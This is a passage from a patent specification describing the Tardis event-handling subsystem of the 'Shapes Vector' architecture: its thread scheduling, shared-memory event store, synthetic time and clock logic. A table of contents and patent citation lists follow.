The identifier, auxiliary field and timestamp are 64 bits each, with the timestamp being conceptually divided into two 32 bit quantities. Within the auxiliary field, the unify flag is 1 bit, the type is 4 bits and the data length is 16 bits (the data length is expressed in bytes, allowing up to 64 Kb of data to accompany each event). This leaves 43 bits of unused space in the auxiliary field.
The cell indices are all 32 bit (allowing a Cell Pool with more than four billion cells). The size of the fixed size data field is to be specified at compile time, but should be a multiple of 64 bits.
For strong reasons of efficiency and performance, Event Cells and Data Cells are stored together in common pools and are the same size. The format of a cell (Event and Data Cell) is shown in FIG. 23.
The following are examples of some events:
• 1. object information (one event id for each type of object)
• signal that a new object has been discovered or that an update of the attributes of the object is available.
• 2. object attribute information (again one event id for each type of object)
• signal that there is new or updated information for an object attribute.
3.2 TimeStamp
The timestamp indicates the time at which the event was generated at the source. It consists of two 32-bit quantities indicating with second and nanosecond components the elapsed time since 00:00 Universal Time (UT) 1 Jan. 1970. Note that specifying this in terms of Universal Time allays any potential problems with events from different time zones. The timestamp is read but not modified by the Tardis. It is stored as a single 64-bit quantity, and should be stored so that the Tardis using a single 64-bit instruction can compare timestamps. The Clients are responsible for ensuring the timestamp is in an appropriate format.
3.3 Shared Memory
The Tardis creates a shared memory segment during start-up. This is so that the Tardis and a number of Monitor processes have fast access to the Tardis Store, which contains all the structures relevant to the Monitors as depicted in FIG. 24.
3.4 Time
Dealing with time within Shapes Vector is complex and raises many issues. The issues range from the relatively simply issue of having to deal with different time zones (from sensors distributed about the place), to synthetic time and its relationship with events in the Tardis.
3.4.1 Universal Time
In order for events to be collated and assessed there needs to be a global clock or frame of reference for time with which events can be time encoded. The standard Universal Time (UT) is an obvious candidate for such a frame of reference.
3.4.2 Synthetic Time
Synthetic time is closely associated with the read lists. The actual synthetic time indicates the time associated with the read lists as read by the Monitors.
The Tardis maintains a Synthetic Time Window, which has a width (the amount of synthetic time between the beginning and end of the window) and a velocity (the amount of synthetic time the window moves by after each clock tick). The front edge (towards the future) of the window represents the Current Synthetic Time. Synthetic Time and the Synthetic Time Window are shown in FIG. 25.
Updates occur at every clock tick. During the update process, the Y Threads use the Synthetic Time Window to process events. Note that the Synthetic Time Window has no relation with real time, and has no bearing on the amount of real time between updates, since the timing of an update is controlled by an external clock mechanism.
The Synthetic Time Window is used to guide the processing of events.
3.5 Process and Thread Activity
The Monitors and Clients operate independently of the Tardis in different processes. The Tardis process consists of several different types of Threads, whose behaviour needs to be controlled to protect shared data.
In order to control the threads, the MThread needs to be able to signal some threads to engage and to disengage. In order to ensure a thread has disengaged, the MThread needs to signal the thread to disengage, and then confirm a response from the thread indicating it has indeed disengaged. This introduces a problem, in that the MThread may signal a thread to disengage, but the thread in question may be busy, and will not check to see if it should disengage in a timely fashion. In this event, the M Thread will be wasting time waiting for the response. In some cases, this is unavoidable, however, the thread may be engaged in an activity which is thread safe. If this is the case, the MThread should not wait for a response from the thread, and can continue safely, so long as the busy thread checks to see if it should disengage before engaging in thread unsafe activity.
Hence each thread should have a flag it maintains indicating whether it is engaged or not. It should also have a flag it maintains indicating whether it is safely engaged or not. Finally, the M Thread should maintain a flag per type of thread it controls (ie; one for X Threads, one for Y Threads and one for Z Threads).
4. Functional Overview of the Tardis
4.1 Tardis Threads
The Tardis is made up of several different types of threads which work together to make the Tardis function. The M Thread is the master thread, and controls the other threads and the update process. X Threads have the job of reading events from the Input Portals, obtaining and populating Event and Data Cells and placing the Event Cells in the appropriate Slot's queue. Y Threads are called on during every update to take certain Event Cells from a Slot's queue, and to place them in the Slot's event list. Z Threads are responsible for creating new connections with Clients through the Input Portals. C Threads are responsible for handling CCI commands and requests.
This is shown in FIG. 26.
Note that the M Thread is the only thread that directly interacts with another thread.
The scheduling of these threads is important, and revolves around an update, which occurs when a clock tick occurs. When the Tardis is not doing an update, the X Threads are handling incoming events and the Z Threads are handling new connections. When an update occurs, the X and Z Threads are disengaged and the Y Threads engaged to update the event lists. At the end of an update, the Y threads are disengaged and the X and Z Threads engaged again.
The M Thread and the C Threads are never disengaged.
FIG. 27 shows when each thread and process is waiting (to be engaged or for the M Thread, for a clock tick). The shaded areas show where the thread or process is not waiting.
The shaded areas represent time periods where:
Client processes are possibly sending events throughout the time they are connected to the Tardis. The Tardis does not have an effect on the process activity of Clients or Monitors. Note that a Client may produce a burst of events and then shutdown, or it may run for an extended period of time, possibly sending events continually or sporadically.
Monitors are able to read the current read lists. They are able to detect any event list switching during reading. Note that if the Monitors finish their processing of the read lists and cells, they wait until the next update to go into action again.
The Tardis is receiving events from Clients and making events available to Monitors.
The M Thread is controlling an update.
The X Threads are engaged and busy storing incoming events. They are also detecting Input Portal Connections that have timed out and adding them to their own “to-remove” lists of Input Portal Connections.
Y Threads are updating the next read lists (the current write lists) and discarding old non-unified events.
Z Threads are accepting Client requests for new Input Portal Connections. They are also creating new Input Portal Connections and placing them in their own “to-add” lists of Input Portal Connections.
C Threads are servicing requests and commands received via CCI.
The X Threads loop through Input Portal Connections, and collect ones which timeout, but do not modify the list of Input Portal Connections. The Z Threads create new Input Portal Connections, but also do not modify the list. This is to avoid X and Z Threads blocking each other over access to the shared list. However, whilst both are disengaged, the to-add and to-remove lists each maintained are used to modify the shared list.
4.2 Tardis Operation
Upon start-up, the MThread creates the shared memory segment, creates a set of Input Portals (and a Z Thread per Input Portal), creates a number of X Threads and Y Threads and then sits in a loop. When a new Client requests an input connection on an Input Portal, the Z Thread for that Input Portal creates an Input Portal Connection object which is later added to the M Thread's Input Portal Connection list.
The Tardis has a number of X Threads responsible for the management of incoming events. X Threads grab events from Input Portal Connections, so each Input Portal Connection needs to be protected by a lock. These events are stored directly into the event queue of the appropriate Slot by the X Threads, so each Slot needs to be protected by a lock. Hence an X Thread can be blocked attempting to get the lock on an Input Portal Connection, and then on the resulting Slot. This should be expected, and by having many X Threads, such blocking need not significantly affect performance (the more X Threads there are, the more blocking will occur, but it will be less significant because other X Threads will use the time constructively).
When a clock tick occurs, the M Thread begins an update. First it flags the X Threads and Z Threads to disengage and ensures they are disengaged or safely executing. Then it signals the Y Threads to engage. When the Y Threads have finished the update, they are disengaged and the X and Z Threads are engaged.
The MThread then updates the current synthetic time, switches the event lists, increments the update counter and prepares the write lists for writing (discarding events in the write lists, which have been read by Monitors). The order of the last operations is critical as the current synthetic time must be updated before the event lists are switched which must be done before incrementing the update counter. The order is used by the Monitors to detect a switch and preserve data integrity.
The Tardis uses multiple Z Threads (one per Input Portal) to accept new Client requests for an Input Portal Connection. For the purpose of protecting data from being written to whilst being read, or written to simultaneously, the Z Threads are placed in a wait state at the same time as the X Threads, and started again at the same time as the X Threads. This means that at any one time, either the Z Threads or the M Thread has access to the Z Threads' to-add lists.
However, the Z Threads may be blocked whilst accepting new connections, so the Z Threads indicate if they are in a safely executing state. The Z Threads relieve from the MThread the job of accepting and creating new connections, which leaves the M Thread better able to maintain responsiveness.
The X and Y Threads may also declare themselves as safely executing in order to reduce the latency that comes with waiting for all X or Y Threads to disengage.
4.3 Tardis Store
FIG. 28 gives an overview of the array of Slots residing within the Tardis Store in shared memory. Each Slot has an index to the first and last Event Cells in its Event Cell queue. It also has an index to the first event in the read and write lists. All Event Cells and Data Cells are from a Cell Pool, although which pool does not matter.
In order to store an event, X Threads first look-up the event id in a Slot Mapping Array. This returns an index to the array of Slots. The Slot contains all the entities the X Thread needs to perform its operations (indices, lock, Guaranteed Cell Pool, unify flag etc.). With this information, the X Thread can obtain and populate the Event Cell and required Data Cells. The X Thread can also insert the Event Cell in the Slot's queue after getting hold of the lock for that Slot (as there could be multiple X Threads trying to insert Event Cells in the same Slot's queue). The event queue for each Slot is time-ordered (based on each Event Cell's timestamp). The last Event Cell in the queue has the largest timestamp the first in the queue is the smallest. The event queue is represented by the first and last Event Cell indices.
The event lists shown in FIG. 29 have their roles switch between the read and write lists each update. These lists are represented by an index to the first Event Cell in the list (the oldest). The lists are separated (broken) from the queue by clearing the index pointers between the newest event in the list and the oldest event in the queue. Hence the Y Threads merely manipulate Slot and Event Cell indices.
When a switch occurs at the end of an update, the event list nominated as the write list becomes the read list (from which Monitors can access the events) and the event list nominated as the read list becomes the write list (which Y Threads will manipulate during the next update).
The event lists are strictly controlled via several variables for each Slot. These define:
• 1. The maximum number of events allowed in an event list.
• 2. The maximum number of unified events allowed in an event list.
• 3. The maximum number of non-unified events allowed in an event list.
The variables are adhered to in the order of the potential events. Table 1 below gives some examples for a potential event queue of: “U, U, N, U, N”, with the last event at the head:
TABLE 1
Max Non Added Non
Max Events Max Unified Unified Added Unified Unified
1 1 1 0 1
10 10 0 3 0
5 5 5 3 2
4 3 3 2 2
3 2 2 1 2
The three variables provide flexible control over the lists. Similarly, there are variables accessible via CCI to monitor the demand for places in an event list (from queued events), and the events which get into an event list (listed events).
Initially, max events is 1, max unified is 1 and max non unified is 1, as in the case of the first example in the table above. This gives behaviour similar to that of Tardis 2.1, where only one event can be made available to Monitors per update, and it is the first potential event in the event queue.
For an event that is received by the Tardis, it can “leave” the Tardis in one of three ways:
Discarded—An event is discarded if it is never considered for placing into an event list. This could be because an X Thread determined it could discard the event, that is, not insert it in an event queue. An event is also discarded if it is placed in a queue, but subsequent changes to the Slot's unify flag and a subsequent call to clear the queue out resulted in it being discarded.
Expired—The event made it into an event queue, but was removed by a Y Thread from the event queue because it did not meet the criteria to get into a read list and synthetic time passed it by (non unified).
Listed—The event made it into an event queue and into a read list and was made available to Monitors. Eventually it was cleared out of a write list.
4.3.1 Guaranteed Cell Pools
The Cell Pool holds a Guaranteed Cell Pool dedicated for each Slot as well as the Shared Cell Pool, which it uses to store the incoming events and data. When a cell (event or data) is required for a Slot, the Slot's Guaranteed Cell Pool Manager is used. If the Guaranteed Cell Pool Manager is unable to supply a cell (ie. it has no free cells), it attempts to get a cell from the Shared Cell Pool Manager.
The total number of cells allocated on start-up by the Cell Pool (Ntc) is given by the following formula:
Ntc=(Ngc*Ns)+Nsc where,
• Ngc is the number of guaranteed cells per Slot, ie. per Guaranteed Cell Pool
• Ns is the number of Slots, and
• Nsc is the number of shared cells within the Shared Cell Pool.
The Shared Cell Pool and the Guaranteed Cell Pools behave in the same way, they maintain a linked list of free cells and they have a lock for accessing that list. Each cell has a Cell Pool Manager pointer so that it can be returned to the appropriate Cell Pool Manager's free cell list.
Hence no entity in the Tardis needs to make a distinction between a guaranteed cell and a shared cell
5. Tardis Clock
A Tardis Clock is a process, which sends clock tick commands to the Tardis' Synthetic Time CCI server. This action triggers an update in the Tardis and provides the mechanism for the Tardis to move through synthetic time and make events available to Monitors. The rate at which clock ticks are received by the Tardis in real time is the update rate in real time. It should be noted that if the Tardis' synthetic time window is less than the Tardis Clock's period, then it is possible that the Tardis' synthetic time could move ahead of real time.
5.1 Clock Ticks
Clock ticks occur when a set of rules defined by a virtual FPGA (Field Programmable Gate Array) is satisfied. The inputs to the FPGA is a word in binary form, where each bit corresponds to the availability of a clock event for that bit position.
The FPGA is shown in FIG. 29, with the table representing the fuse bits shown below along with the resulting clock tick expression:
tick=(A & C) or (A & B & C) or (C) or (A & B & C)
The fuse bits allow rules to be applied to the input word bits (A, B, C, . . . ) to determine whether a clock tick should occur. A fuse bit of 1 means it is not blown and the relevant bit is input to the relevant AND gate. The results are combined by an OR gate. If a row of fuse bits is not needed then the fuse bits should all be 0.
Table 2, of clock counters is also maintained, as is shown below. When a clock event with a certain ID is received, the clock event count for that event is incremented. When a clock tick occurs, all clock event counters are decremented (but cannot be less than zero). A bit of the FPGA input word is formed if the corresponding counter is non zero:
TABLE 2
Clock Event ID Clock Event counter FPGA Input word (1)
0 4 1
1 1 1
2 0 0
3 1 1
If each row of fuse bits is considered a binary word (W1, W2, W3, . . . ) then a rule will fail if:
• rule fail=!I & W
So a tick should not occur when:
• tick fail=(!I & W1) & (!I & W2) & (!I &W3)
Therefore a tick should occur when:
• tick=!((!I & W1) & (!I & W2) & (!I &W3))
This can be evaluated very quickly. Note that since it is assumed that the Tardis is built for a 64-bit architecture, we can allow for 64 unique clock event IDs and as many rules as required. If we allow for n rules, the fuse bit table uses n 64 bit words.
Event IDs are allocated to clock event sources via CCI, which can also be used as a mechanism to modify the FPGA fuse bit table and the clock event counters.
6. Monitors
Monitors connect to the shared memory segment created by the Tardis on start-up. This allows the Monitors to be able to read data from the Tardis Store, such as the read lists that have just been processed by the Tardis. Note that they may use a Tardis Store Proxy to do this.
The Monitors need to wait until a switch has occurred, and they need to be able to detect a subsequent switch if one comes before they finish reading from the read list.
To do this, the Monitors wait for the update counter to change indicating a switch. They then read all the data it requires from the array, making local copies of data. It can verify the integrity of the data by checking that the timestamp has not changed.
This is required every time data is read from the array. Even if the timestamp has not changed, if a pointer is then used to get data, the timestamp needs to be checked again to ensure that the pointer hasn't been de-referenced. This means that a Monitor should collect all the data it needs from shared memory first, and then act on that data once its integrity has been verified.
There may be many different types of Monitors, but they need to get data from the Tardis in a similar way.
7. Clients
7.1 Overview
Clients communicate with the Tardis via Input Portal Connections. The Tardis' Z Threads almost continuously check for new Clients so they can accept new Input Portal Connections.
Connections can be made through different Input Portals, so the Tardis may have Clients sending events via sockets, and other paths, such as via shared memory.
The user and the Clients can request the number of available Inputs Portals, the type of available Input Portals, their identifiers and the details for available Input Portals from the Tardis via CCI, and then establish connections on a specific Input Portal (as specified by type and identifier). An identifier is preferably an ordered data value associated with the event by the Client. It may in a preferred embodiment be a integer within a range of natural numbers.
There may be many different types of Clients, but they need to send data to the Tardis in a similar way.
Tardis Appendix/Glossary
A.1 Tardis
The Tardis is the event handling sub-system for Shapes Vector. The Tardis receives events from Tardis Clients and stores the events in shared memory for Tardis Monitors to read.
A.2 Tardis Monitor
Tardis Monitors are the event observation sub-systems for Shapes Vector. They read and process the events made available for Monitors by the Tardis.
A.3 Tardis Client
Tardis Clients connect to the Tardis and send events through an Input Portal Connection. The Input Portal can be of several different types, such as a socket connection or shared memory.
A.4 Input Portal
An Input Portal is an object representing a conduit through which events are sent to the Tardis. Each Input Portal can have multiple Input Portal Connections that are specific connections through an Input Portal through which a single Client sends events to the Tardis. Each Input Portal has a type and an identifier.
A.5 Mutex
Mutexes are mutual exclusion locks that prevent multiple threads from simultaneously executing critical sections of code, which access shared data.
A.6 Semaphore
A semaphore is a non-negative integer count and is generally used to coordinate access to resources. The initial semaphore count is set to the number of free resources, then threads increment and decrement the count as resources are added and removed. If the semaphore count drops to zero, which means no available resources, threads attempting to decrement the semaphore will block until the count is greater than zero.
A.7 X Threads (Event Processing Threads)
X Threads are responsible for obtaining a new event from the Input Portal Connections and processing the event by storing it in the Tardis Store. They also detect timed out Input Portal Connections.
A.8 Y Threads (Array Managing Threads)
Y Threads are responsible for updating the lists of events to be read by the Monitors. They do so by manipulating Slot and Event Cell indices for event queues. Y Threads are each responsible for updating the event queue for a specified range of Slots.
A.9 Z Threads
Z Threads are responsible for accepting new connection requests from new Clients and creating new Input Portal Connections. These Input Portal Connections are added to a list, which is added to the M Thread's list when the Z Threads are waiting.
A.10 Guarantee
Guarantees are a set of pre-allocated Event/Data Cells (created upon start-up), used as the first choice of storage area for events and data for each Slot.
Tardis Features Summary
TARDIS features specifically include:
• 1. A set of slots where each semantic is associated with a unique slot. No slot is reused as the system evolves.
• 2. A slot logic, which allows for flexible handling of prioritised events.
• 3. A synthetic clock which can be set to tick in a flexible user-specified manner.
• 4. A taxonomy superimposed over the slots in order to group and catalogue like semantics
It will be appreciated by those skilled in the art, that the inventions described herein are not restricted in their use to the particular application described. Neither are the present inventions restricted in their preferred embodiments with regard to particular elements and/or features described or depicted herein. It will be appreciated that various modifications can be made without departing from the principles of these inventions. Therefore, the inventions should be understood to include all such modifications within their scope.
Part 1 SHAPES VECTOR 1
1 Shapes Vector Introduction 1
2 Architectural Components 6
2.1 Primary Functional Architecture 6
2.1.1 Configuration Interface and I/O Sub-system 6
2.1.2 Sensors 7
2.1.3 Intelligent Agent Architecture 8
2.1.3.1 Knowledge Base 8
2.1.3.2 Intelligent Agents and Ontologies 9
2.1.4 The Tardis 10
2.1.5 Monitor 10
2.2 The Hardware 11
2.3 System Software 12
3 The “Classical” Visualisation Paradigm 13
3.1 Geo View 15
3.2 Data View 18
4 Intelligent Agents 23
4.1 Agent Architecture 24
4.2 Inferencing Strategies 26
4.2.1 Traditional 26
4.2.2 Vectors 27
4.3 Other Applications 31
5 Synthetic Stroboscopes and Selective Zoom 32
5.1 Synthetic Strobes 32
5.2 Selective Zoom 34
6 Temporal Hierarchies 36
6.1 Strobes Revisited 36
6.2 User Information Overload 37
6.3 Data Streams and IA's 37
7 Other Visualisation Efforts 38
7.1 NetPARS 39
7.2 Security Visualisation 41
7.3 Network Visualisation 41
7.4 Data Mining 42
7.5 Parentage and Autograph 43
Appendix Part 1 - Custom Control Environments for Shapes Vector 44
A.1 Strategic Environment 45
A.2 Tactical Environment 45
PART 2 SHAPES VECTOR MASTER ARCHITECTURE 47
1. Introduction 47
1.1 Shapes Vector Master Architecture 47
1.2 Precis of this part of the specification 48
2. The Agent Architecture 49
2.1 Agent Architecture 50
2.2 A Note on the Tardis 53
3. Inferencing Strategies 54
3.1 Traditional 54
3.2 Possiblistic 55
3.3 Vectors 56
3.4 Inferencing for Computer Security Applications 60
3.4 Other Applications 63
4. Rules for Constructing an Agent 63
5. Agents and Time 65
5.1 Data Streams and IA's 65
5.2 Temporal Event Mapping for Agents 67
6. Implications for Higher Level Agents 68
7. Higher Level Ontologies 69
71 Level 2 69
7.1.1 Relationships 70
7.1.2 Interrogative Operators 72
7.2 Level 3 and Above 75
7.3 An Example of Possiblistic Querying 76
7.4 An Example of the Use of Consistency 78
8. User Avatars 79
9. Further Comments on the Architecture 80
10.1 AAFID 81
10.2 Comparison with the Bass' Comments 82
11. A Multi-Abstractional Framework for Shapes Vector Agents 83
11.1 Concepts 84
12. Summary 87
Part 3 DATA VIEW SPECIFICATION 90
1. Data View Specification 90
1.1 Universe 90
1.2 Objects 92
1.3 Aggregate Objects 93
1.4 Object Selector 95
1.5 Mass, Charge and Flavours 96
1.6 Forces 98
1.7 Phantoming 98
1.8 Markers 99
1.9 Radius of Influence Display 100
1.10 Pulses 100
1.11 Irregular Functions 100
Part 4 GEO VIEW SPECIFICATION 102
1. Introduction 102
1.1 Identification 102
1.2 System Overview 102
1.2.1 General 102
1.2.2 Geo View Module Scope 103
1.3 Overview 103
2. Referenced Documents 104
2.1 Standard 104
3. Module-wide Design Decisions 104
3.1 Design decisions and goals of Geo View 104
4. Module Architectural Design 105
4.1 Geo View Functional Design 106
4.1.1 Geo View General 106
4.1.1.1 Event Handling 106
4.1.1.2 MasterTable Functionality 107
4.1.1.3 CCI Interface 107
4.1.1.4 GeoView Processing and Caching 108
4.1.2 LayoutHierarchy 111
4.1.2.1 Class Hierarchy 111
4.1.2.2 Logical Object Hierarchy 112
4.1.2.3 Processing 114
4.1.3 Layout Structure Template Library (LSTL) 117
4.1.3.1 GenericGraph 117
4.1.3.2 GenericLine 118
4.1.3.3 GenericMatrix 118
4.1.3.4 GenericRing 119
4.1.3.5 GenericStar 119
4.1.3.6 GenericRectangle 120
4.1.3.7 GenericTree 120
4.2 Concept of Execution 121
4.3 Interface Design 121
5. Module Detailed Design 121
5.1 Geo View Classes 121
5.1.1 Geo View Class Summary 121
5.2 LayoutHierarchy Classes 122
5.2.1 LayoutHierarchy Class Summary 122
5.2.2 Event Insertion and Removal Methods 124
5.2.2.1 cfInsert 124
5.2.2.2 Adding Inverse Attributes 124
5.2.2.3 NetworkObject Insertion 125
5.2.2.4 Attribute Insertion 125
5.2.3 Layout Rule Application Methods 126
5.2.3.1 applyLayoutstructureRulesToObject 126
5.2.3.2 applyAttachedToRulesToOb]ect 128
5.2.3.3 applyLocatedinRulesTo Object 129
5.2.3.4 findSatisfledRules 129
5.2.3.5 composeObjects 130
5.2.4 Leaf Edge Creation Methods 131
5.2.4.1 createEdges 131
5.2.4.2 createEdge 132
5.2.4.3 updateEdges 132
5.2.4.4 addEdge 133
5.2.4.5 addGEdge 133
5.3 LayoutStructureTemplateLibrary (LSTL) Classes 133
5.3.1 LSTL Template Class Summary 133
5.3.2 GenericGraph Methods 134
5.3.2.1 Node Separation Factor 134
5.32.2 Rank Separation Factor 134
5.3.2.3 Orientation 134
5.3.3 GenericLine Methods 134
5.3.3.1 Axis 134
5.3.3.2 Linear Direction 134
5.3.3.3 Origin 135
5.32.4 Separation 135
5.3.4 GenericMatrix Methods 135
5.3.4.1 Width Separation 135
5.3.4.2 Depth Separation 135
5.3.4.3 Delete Policy 135
5.3.4.4 Origin Policy 136
5.3.5 GenericRing Methods 136
5.35.1 Angular Direction 136
5.3.5.2 Radius 136
5.3.5.3 Separation 136
5.3.6 GenericStar Methods 137
52.6.1 Root Height 137
5.3.7 GenericRectangle Methods 137
5.3.7.1 Angular Direction 137
5.3.7.2 Start Side 137
5.3.7.3 Width Separation 137
5.3.7.4 Depth Separation 137
5.3.7.5 Width 138
5.3.7.6 Depth 138
5.3.8 LSTL Class Interface 138
5.3.8.1 Memory Allocation 139
5.3.8.2 Relative Placement 139
5.3.9 T Interface 139
6. Appendix for GeoView 140
7.1 Abbreviations 140
7.2 Definition of Terms 141
Part 5 TARDIS SPECIFICATION 143
1. Tardis Specification 143
1.1 Introduction 143
1.2 Assumptions 144
2. Overview of the Tardis 144
2.1 Components 145
2.2 Overview of Operation 146
3. Tardis Concepts 146
3.1 Events 146
3.2 TimeStamp 148
3.3 Shared Memory 149
3.4 Time 149
3.4.1 Universal Time 149
3.4.2 Synthetic Time 150
3.5 Process and Thread Activity 150
4. Functional Overview of the Tardis 151
4.1 Tardis Threads 151
4.2 Tardis Operation 153
4.3 Tardis Store 155
4.3.1 Guaranteed Cell Pools 157
5. Tardis Clock 158
5.1 Clock Ticks 159
6. Monitors 160
7. Clients 161
7.1 Overview 161
Tardis Appendix/Glossary 162
A.1 Tardis 162
A.2 Tardis Monitor 162
A.3 Tardis Client 162
A.4 Input Portal 162
A.5 Mutex 163
A.6 Semaphore 163
A.7 X Threads (Event Processing Threads) 163
A.8 Y Threads (Array Managing Threads) 163
A.9 Z Threads 164
A.10 Guarantee 164
Tardis Features Summary 164
Claims defining the invention are as follows: 171
Patent Citations
Cited PatentFiling datePublication dateApplicantTitle
US5434978Feb 18, 1994Jul 18, 1995International Business Machines CorporationCommunications interface employing unique tags which enable a destination to decode a received message structure
US5555354Mar 23, 1993Sep 10, 1996Silicon Graphics Inc.Method and apparatus for navigation within three-dimensional information landscape
US5778157Jun 17, 1996Jul 7, 1998Yy Software CorporationSystem and method for expert system analysis using quiescent and parallel reasoning and set structured knowledge representation
US5790789Aug 2, 1996Aug 4, 1998Suarez; LarryMethod and architecture for the creation, control and deployment of services within a distributed computer environment
US5801696Jul 27, 1995Sep 1, 1998International Business Machines Corp.Message queue for graphical user interface
US5802296Aug 2, 1996Sep 1, 1998Fujitsu Software CorporationSupervisory powers that provide additional control over images on computers system displays to users interactings via computer systems
US5907328Aug 27, 1997May 25, 1999International Business Machines CorporationAutomatic and configurable viewpoint switching in a 3D scene
US5973678Aug 29, 1997Oct 26, 1999Ford Global Technologies, Inc.Method and system for manipulating a three-dimensional object utilizing a force feedback interface
US6034692Aug 1, 1997Mar 7, 2000U.S. Philips CorporationVirtual environment navigation
US6064984Aug 29, 1996May 16, 2000Marketknowledge, Inc.Graphical user interface for a computer-implemented financial planning tool
US6222547Feb 7, 1997Apr 24, 2001California Institute Of TechnologyMonitoring and analysis of data in cyberspace
US6831640 *Feb 26, 2003Dec 14, 2004Sensable Technologies, Inc.Systems and methods for sculpting virtual objects in a haptic virtual reality environment
US6839663 *Sep 29, 2000Jan 4, 2005Texas Tech UniversityHaptic rendering of volumetric soft-bodies objects
US6853965 *Nov 16, 2001Feb 8, 2005Massachusetts Institute Of TechnologyForce reflecting haptic interface
US6867707 *Apr 24, 2002Mar 15, 2005Elster Electricity, LlcAutomated on-site meter registration confirmation using a portable, wireless computing device
WO1999044160A1Mar 1, 1999Sep 2, 1999Sabre Group IncMethods and apparatus for accessing information from multiple remote sources
WO2001015017A1Aug 25, 2000Mar 1, 2001Lg Electronics IncVideo data structure for video browsing based on event
WO2001093599A2May 26, 2001Dec 6, 2001Wisengine IncMethod and apparatus for unified query interface for network information
WO2002088925A1Apr 30, 2002Nov 7, 2002Commw Of AustraliaA data processing and observation system
WO2002088926A1Apr 30, 2002Nov 7, 2002Commw Of AustraliaAn event handling system
WO2002088927A1Apr 30, 2002Nov 7, 2002Commw Of AustraliaGeographic view of a modelling system
WO2002088988A1Apr 30, 2002Nov 7, 2002Commw Of AustraliaData processing architecture
Non-Patent Citations
Reference
1Bass, T. (Apr. 2000). "Intrustion Detection Systems & Multisensor Fusion: Creating Cyberspace Situational Awareness," Communications of the ACM 43(4):99-105.
2Spafford, E. and Zanboni, D. (2000). "Intrusion Detection Using Autonomous Agents," Journal of Computer Networks 34: 547-570.
Referenced by
Citing PatentFiling datePublication dateApplicantTitle
US7250944 *Apr 30, 2002Jul 31, 2007The Commonweath Of AustraliaGeographic view of a modelling system
US7298378 *Dec 13, 2004Nov 20, 2007Hagenbuch Andrew MVirtual reality universe realized as a distributed location network
US7330185 *May 10, 2004Feb 12, 2008PixarTechniques for processing complex scenes
US7392162 *Nov 7, 2003Jun 24, 2008Rage Frameworks, Inc.System and method for device developing model networks purely by modelling as meta-data in a software application
US7411590Aug 9, 2004Aug 12, 2008Apple Inc.Multimedia file format
US7483026 *Jan 15, 2004Jan 27, 2009Fischer John GMethod of displaying product and service performance data
US7490295Jun 25, 2004Feb 10, 2009Apple Inc.Layer for accessing user interface elements
US7518611Apr 6, 2006Apr 14, 2009Apple Inc.Extensible library for storing objects of different types
US7584294Mar 12, 2007Sep 1, 2009Citrix Systems, Inc.Systems and methods for prefetching objects for caching using QOS
US7593024 *Jul 28, 2005Sep 22, 2009International Business Machines CorporationScreen calibration for display devices
US7643012 *Mar 26, 2007Jan 5, 2010Lg Electronics Inc.Terminal and method for selecting displayed items
US7681112May 30, 2003Mar 16, 2010Adobe Systems IncorporatedEmbedded reuse meta information
US7702668Jun 16, 2003Apr 20, 2010Microsoft CorporationAsset composition
US7707514May 5, 2006Apr 27, 2010Apple Inc.Management of user interface elements in a display environment
US7714869Apr 27, 2006May 11, 2010PixarTechniques for animating complex scenes
US7720936Mar 12, 2007May 18, 2010Citrix Systems, Inc.Systems and methods of freshening and prefreshening a DNS cache
US7743336May 10, 2006Jun 22, 2010Apple Inc.Widget security
US7752556May 10, 2006Jul 6, 2010Apple Inc.Workflow widgets
US7761800Jun 23, 2005Jul 20, 2010Apple Inc.Unified interest layer for user interface
US7774492Jul 26, 2001Aug 10, 2010Citrix Systems, Inc.System, method and computer program product to maximize server throughput while avoiding server overload by controlling the rate of establishing server-side net work connections
US7783757Mar 12, 2007Aug 24, 2010Citrix Systems, Inc.Systems and methods of revalidating cached objects in parallel with request for object
US7793222Jan 14, 2009Sep 7, 2010Apple Inc.User interface element with auxiliary function
US7793232Mar 7, 2006Sep 7, 2010Apple Inc.Unified interest layer for user interface
US7800614 *Feb 9, 2005Sep 21, 2010Oracle America, Inc.Efficient communication in a client-server scene graph system
US7809818Mar 12, 2007Oct 5, 2010Citrix Systems, Inc.Systems and method of using HTTP head command for prefetching
US7814041 *Mar 20, 2007Oct 12, 2010Caporale John LSystem and method for control and training of avatars in an interactive environment
US7831728Nov 1, 2006Nov 9, 2010Citrix Systems, Inc.Methods and systems for real-time seeking during real-time playback of a presentation layer protocol data stream
US7833135Jun 27, 2008Nov 16, 2010Scott B. RadowStationary exercise equipment
US7834878Jan 27, 2009Nov 16, 2010Fischer John GMethod of displaying product and service performance data
US7853678Mar 12, 2007Dec 14, 2010Citrix Systems, Inc.Systems and methods for configuring flow control of policy expressions
US7853679Mar 12, 2007Dec 14, 2010Citrix Systems, Inc.Systems and methods for configuring handling of undefined policy events
US7862476Dec 22, 2006Jan 4, 2011Scott B. RadowExercise device
US7865589Mar 12, 2007Jan 4, 2011Citrix Systems, Inc.Systems and methods for providing structured policy expressions to represent unstructured data in a network appliance
US7870096 *Jan 17, 2006Jan 11, 2011Microsoft CorporationAsset composition
US7870277Mar 12, 2007Jan 11, 2011Citrix Systems, Inc.Systems and methods for using object oriented expressions to configure application security policies
US7932909Apr 13, 2007Apr 26, 2011Apple Inc.User interface for controlling three-dimensional animation of an object
US7941433Jan 22, 2007May 10, 2011Glenbrook Associates, Inc.System and method for managing context-rich database
US7954064Feb 1, 2006May 31, 2011Apple Inc.Multiple dashboards
US7984384Jul 19, 2011Apple Inc.Web view layer for accessing user interface elements
US8046322Aug 7, 2007Oct 25, 2011The Boeing CompanyMethods and framework for constraint-based activity mining (CMAP)
US8051124Jul 19, 2007Nov 1, 2011Itt Manufacturing Enterprises, Inc.High speed and efficient matrix multiplication hardware module
US8059127Apr 6, 2010Nov 15, 2011PixarTechniques for animating complex scenes
US8074028Mar 12, 2007Dec 6, 2011Citrix Systems, Inc.Systems and methods of providing a multi-tier cache
US8140988 *Sep 28, 2007Mar 20, 2012Fujitsu LimitedCAD apparatus, method of editing graphic data, and computer product
US8150857Jan 22, 2007Apr 3, 2012Glenbrook Associates, Inc.System and method for context-rich database optimized for processing of concepts
US8209201 *Dec 8, 2005Jun 26, 2012Hewlett-Packard Development Company, L.P.System and method for correlating objects
US8239749Jun 2, 2005Aug 7, 2012Apple Inc.Procedurally expressing graphic objects for web pages
US8249932Oct 26, 2007Aug 21, 2012Resource Consortium LimitedTargeted advertising in a situational network
US8253747Mar 23, 2010Aug 28, 2012Apple Inc.User interface for controlling animation of an object
US8266538Sep 11, 2012Apple Inc.Remote access to layer and user interface elements
US8274897Oct 17, 2011Sep 25, 2012Resource Consortium LimitedLocation based services in a situational network
